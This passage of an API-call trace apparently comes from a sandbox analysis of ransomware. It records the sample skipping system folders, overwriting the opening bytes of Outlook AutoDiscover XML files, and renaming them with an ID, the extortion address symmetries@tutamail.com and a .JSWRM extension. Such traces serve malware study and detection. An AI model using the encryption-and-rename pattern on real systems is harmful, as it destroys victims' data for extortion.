cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.IN.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.IN.XML", lpUsedDefaultChar=0x0) returned 15 [0137.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.IN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.in.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.913] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=810) returned 1 [0137.913] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.913] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.915] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.915] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.915] CloseHandle (hObject=0x238) returned 1 [0137.915] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.IN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.in.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.IN.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.in.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.916] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c969bd6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.CO.JP.XML", cAlternateFileName="YA40E5~1.XML")) returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2=".") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="..") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="...") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="windows") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="recovery") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="perflogs") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="documents and settings") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="system volume information") returned 1 [0137.917] lstrcmpiW (lpString1="YAHOO.CO.JP.XML", lpString2="msocache") returned 1 [0137.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.JP.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.JP.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.JP.XML", lpUsedDefaultChar=0x0) returned 15 [0137.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.JP.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.JP.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.JP.XML", lpUsedDefaultChar=0x0) returned 15 [0137.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.JP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.918] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=811) returned 1 [0137.918] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.918] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.920] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.920] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.920] CloseHandle (hObject=0x238) returned 1 [0137.920] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.JP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.jp.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.JP.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.jp.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.921] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c969bd6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.CO.KR.XML", cAlternateFileName="YAHOOC~4.XML")) returned 1 [0137.921] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2=".") returned 1 [0137.921] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="..") returned 1 [0137.921] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="...") returned 1 [0137.921] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="windows") returned 1 [0137.921] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="recovery") returned 1 [0137.921] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="perflogs") returned 1 [0137.922] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="documents and settings") returned 1 [0137.922] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.922] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="system volume information") returned 1 [0137.922] lstrcmpiW (lpString1="YAHOO.CO.KR.XML", lpString2="msocache") returned 1 [0137.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.KR.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.KR.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.KR.XML", lpUsedDefaultChar=0x0) returned 15 [0137.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.KR.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.KR.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.KR.XML", lpUsedDefaultChar=0x0) returned 15 [0137.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.KR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.923] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0137.923] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.923] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.925] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.925] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.925] CloseHandle (hObject=0x238) returned 1 [0137.925] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.KR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.kr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.KR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.kr.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.940] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c969bd6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.CO.NZ.XML", cAlternateFileName="YAHOOC~1.XML")) returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2=".") returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="..") returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="...") returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="windows") returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="recovery") returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="perflogs") returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="documents and settings") returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.940] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="system volume information") returned 1 [0137.941] lstrcmpiW (lpString1="YAHOO.CO.NZ.XML", lpString2="msocache") returned 1 [0137.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.NZ.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.NZ.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.NZ.XML", lpUsedDefaultChar=0x0) returned 15 [0137.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.NZ.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.NZ.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.NZ.XML", lpUsedDefaultChar=0x0) returned 15 [0137.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.nz.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.943] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.943] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.943] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.944] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.944] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.944] CloseHandle (hObject=0x238) returned 1 [0137.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.nz.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.NZ.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.nz.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.945] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c969bd6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.CO.TH.XML", cAlternateFileName="YACB7D~1.XML")) returned 1 [0137.945] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2=".") returned 1 [0137.945] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="..") returned 1 [0137.945] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="...") returned 1 [0137.946] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="windows") returned 1 [0137.946] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="recovery") returned 1 [0137.946] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="perflogs") returned 1 [0137.946] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="documents and settings") returned 1 [0137.946] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.946] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="system volume information") returned 1 [0137.946] lstrcmpiW (lpString1="YAHOO.CO.TH.XML", lpString2="msocache") returned 1 [0137.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.TH.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.TH.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.TH.XML", lpUsedDefaultChar=0x0) returned 15 [0137.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.TH.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.TH.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.TH.XML", lpUsedDefaultChar=0x0) returned 15 [0137.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.TH.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.th.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.947] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=810) returned 1 [0137.947] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.947] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0137.948] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.948] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0137.948] CloseHandle (hObject=0x238) returned 1 [0137.949] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.TH.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.th.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.CO.TH.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.co.th.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.950] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c969bd6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.CO.UK.XML", cAlternateFileName="YAHOOC~3.XML")) returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2=".") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="..") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="...") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="windows") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="recovery") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="perflogs") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="documents and settings") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="$RECYCLE.BIN") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="system volume information") returned 1 [0137.950] lstrcmpiW (lpString1="YAHOO.CO.UK.XML", lpString2="msocache") returned 1 [0137.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.UK.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.UK.XML", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.UK.XML", lpUsedDefaultChar=0x0) returned 15 [0137.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.UK.XML", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.CO.UK.XML", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.CO.UK.XML", lpUsedDefaultChar=0x0) returned 15 [0137.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 